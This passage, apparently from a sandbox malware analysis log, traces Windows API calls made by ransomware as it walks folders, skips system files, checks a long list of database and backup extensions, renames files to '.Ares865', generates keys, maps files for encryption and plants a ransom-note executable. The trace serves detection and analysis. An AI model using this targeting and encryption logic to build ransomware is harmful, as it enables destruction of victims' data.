hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.660] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.660] CloseHandle (hObject=0x15c) returned 1 [0089.660] CloseHandle (hObject=0x118) returned 1 [0089.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.660] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.660] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe5bc2f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x41d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="D42CC0~1")) returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="aoldtz.exe") returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".") returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="..") returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="windows") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="bootmgr") returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="temp") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="pagefile.sys") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="boot") returned 1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ids.txt") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="perflogs") returned -1 [0089.660] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="MSBuild") returned -1 [0089.660] lstrlenW (lpString="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.660] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0089.661] lstrcpyW (in: lpString1=0x2cce462, lpString2="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0089.661] lstrlenW (lpString="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.661] lstrlenW (lpString="Ares865") returned 7 [0089.661] lstrcmpiW (lpString1="416e53f", lpString2="Ares865") returned -1 [0089.661] lstrlenW (lpString=".dll") returned 4 [0089.661] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".dll") returned 1 [0089.661] lstrlenW (lpString=".lnk") returned 4 [0089.661] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".lnk") returned 1 [0089.661] lstrlenW (lpString=".ini") returned 4 [0089.661] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".ini") returned 1 [0089.661] lstrlenW (lpString=".sys") returned 4 [0089.661] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".sys") returned 1 [0089.661] lstrlenW (lpString="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0089.661] lstrlenW (lpString="bak") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="bak") returned -1 [0089.661] lstrlenW (lpString="ba_") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="ba_") returned -1 [0089.661] lstrlenW (lpString="dbb") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="dbb") returned -1 [0089.661] lstrlenW (lpString="vmdk") returned 4 [0089.661] lstrcmpiW (lpString1="e53f", lpString2="vmdk") returned -1 [0089.661] lstrlenW (lpString="rar") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="rar") returned -1 [0089.661] lstrlenW (lpString="zip") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="zip") returned -1 [0089.661] lstrlenW (lpString="tgz") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="tgz") returned -1 [0089.661] lstrlenW (lpString="vbox") returned 4 [0089.661] lstrcmpiW (lpString1="e53f", lpString2="vbox") returned -1 [0089.661] lstrlenW (lpString="vdi") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="vdi") returned -1 [0089.661] lstrlenW (lpString="vhd") returned 3 [0089.661] lstrcmpiW (lpString1="53f", lpString2="vhd") returned -1 [0089.661] lstrlenW (lpString="vhdx") returned 4 [0089.661] lstrcmpiW (lpString1="e53f", lpString2="vhdx") returned -1 [0089.661] lstrlenW (lpString="avhd") returned 4 [0089.661] lstrcmpiW (lpString1="e53f", lpString2="avhd") returned 1 [0089.661] lstrlenW (lpString="db") returned 2 [0089.661] lstrcmpiW (lpString1="3f", lpString2="db") returned -1 [0089.661] lstrlenW (lpString="db2") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="db2") returned -1 [0089.662] lstrlenW (lpString="db3") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="db3") returned -1 [0089.662] lstrlenW (lpString="dbf") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="dbf") returned -1 [0089.662] lstrlenW (lpString="mdf") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="mdf") returned -1 [0089.662] lstrlenW (lpString="mdb") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="mdb") returned -1 [0089.662] lstrlenW (lpString="sql") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="sql") returned -1 [0089.662] lstrlenW (lpString="sqlite") returned 6 [0089.662] lstrcmpiW (lpString1="16e53f", lpString2="sqlite") returned -1 [0089.662] lstrlenW (lpString="sqlite3") returned 7 [0089.662] lstrcmpiW (lpString1="416e53f", lpString2="sqlite3") returned -1 [0089.662] lstrlenW (lpString="sqlitedb") returned 8 [0089.662] lstrcmpiW (lpString1="c416e53f", lpString2="sqlitedb") returned -1 [0089.662] lstrlenW (lpString="xml") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="xml") returned -1 [0089.662] lstrlenW (lpString="$er") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="$er") returned 1 [0089.662] lstrlenW (lpString="4dd") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="4dd") returned 1 [0089.662] lstrlenW (lpString="4dl") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="4dl") returned 1 [0089.662] lstrlenW (lpString="^^^") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="^^^") returned 1 [0089.662] lstrlenW (lpString="abs") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="abs") returned -1 [0089.662] lstrlenW (lpString="abx") returned 3 [0089.662] lstrcmpiW (lpString1="53f", lpString2="abx") returned -1 [0089.662] lstrlenW (lpString="accdb") returned 5 [0089.662] lstrcmpiW (lpString1="6e53f", lpString2="accdb") returned -1 [0089.662] lstrlenW (lpString="accdc") returned 5 [0089.662] lstrcmpiW (lpString1="6e53f", lpString2="accdc") returned -1 [0089.662] lstrlenW (lpString="accde") returned 5 [0089.662] lstrcmpiW (lpString1="6e53f", lpString2="accde") returned -1 [0089.662] lstrlenW (lpString="accdr") returned 5 [0089.663] lstrcmpiW (lpString1="6e53f", lpString2="accdr") returned -1 [0089.663] lstrlenW (lpString="accdt") returned 5 [0089.663] lstrcmpiW (lpString1="6e53f", lpString2="accdt") returned -1 [0089.663] lstrlenW (lpString="accdw") returned 5 [0089.663] lstrcmpiW (lpString1="6e53f", lpString2="accdw") returned -1 [0089.663] lstrlenW (lpString="accft") returned 5 [0089.663] lstrcmpiW (lpString1="6e53f", lpString2="accft") returned -1 [0089.663] lstrlenW (lpString="adb") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="adb") returned -1 [0089.663] lstrlenW (lpString="adb") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="adb") returned -1 [0089.663] lstrlenW (lpString="ade") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="ade") returned -1 [0089.663] lstrlenW (lpString="adf") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="adf") returned -1 [0089.663] lstrlenW (lpString="adn") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="adn") returned -1 [0089.663] lstrlenW (lpString="adp") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="adp") returned -1 [0089.663] lstrlenW (lpString="alf") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="alf") returned -1 [0089.663] lstrlenW (lpString="ask") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="ask") returned -1 [0089.663] lstrlenW (lpString="btr") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="btr") returned -1 [0089.663] lstrlenW (lpString="cat") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="cat") returned -1 [0089.663] lstrlenW (lpString="cdb") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="cdb") returned -1 [0089.663] lstrlenW (lpString="ckp") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="ckp") returned -1 [0089.663] lstrlenW (lpString="cma") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="cma") returned -1 [0089.663] lstrlenW (lpString="cpd") returned 3 [0089.663] lstrcmpiW (lpString1="53f", lpString2="cpd") returned -1 [0089.663] lstrlenW (lpString="dacpac") returned 6 [0089.663] lstrcmpiW (lpString1="16e53f", lpString2="dacpac") returned -1 [0089.663] lstrlenW (lpString="dad") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dad") returned -1 [0089.664] lstrlenW (lpString="dadiagrams") returned 10 [0089.664] lstrcmpiW (lpString1="9ec416e53f", lpString2="dadiagrams") returned -1 [0089.664] lstrlenW (lpString="daschema") returned 8 [0089.664] lstrcmpiW (lpString1="c416e53f", lpString2="daschema") returned -1 [0089.664] lstrlenW (lpString="db-journal") returned 10 [0089.664] lstrcmpiW (lpString1="9ec416e53f", lpString2="db-journal") returned -1 [0089.664] lstrlenW (lpString="db-shm") returned 6 [0089.664] lstrcmpiW (lpString1="16e53f", lpString2="db-shm") returned -1 [0089.664] lstrlenW (lpString="db-wal") returned 6 [0089.664] lstrcmpiW (lpString1="16e53f", lpString2="db-wal") returned -1 [0089.664] lstrlenW (lpString="dbc") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dbc") returned -1 [0089.664] lstrlenW (lpString="dbs") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dbs") returned -1 [0089.664] lstrlenW (lpString="dbt") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dbt") returned -1 [0089.664] lstrlenW (lpString="dbv") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dbv") returned -1 [0089.664] lstrlenW (lpString="dbx") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dbx") returned -1 [0089.664] lstrlenW (lpString="dcb") returned 3 [0089.664] lstrcmpiW (lpString1="53f", lpString2="dcb") returned -1 [0089.665] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865") returned 126 [0089.665] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwFlags=0x1) returned 1 [0089.665] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.Ares865" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.666] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1053) returned 1 [0089.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.666] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.667] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.667] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.667] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x15c [0089.668] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x190000 [0089.670] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.670] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.670] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.670] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.671] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.671] CloseHandle (hObject=0x15c) returned 1 [0089.671] CloseHandle (hObject=0x118) returned 1 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.671] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.671] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.671] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.671] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.671] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.671] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0089.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.672] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0089.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0089.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.672] GetLastError () returned 0x0 [0089.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.672] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.672] CloseHandle (hObject=0x120) returned 1 [0089.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.673] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.673] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.673] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.673] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.673] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.673] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.673] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.673] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.673] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0089.673] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0089.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0089.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0089.673] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 40 [0089.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys" [0089.673] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.673] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.674] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.674] GetLastError () returned 0x0 [0089.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.674] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.674] CloseHandle (hObject=0x120) returned 1 [0089.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.674] 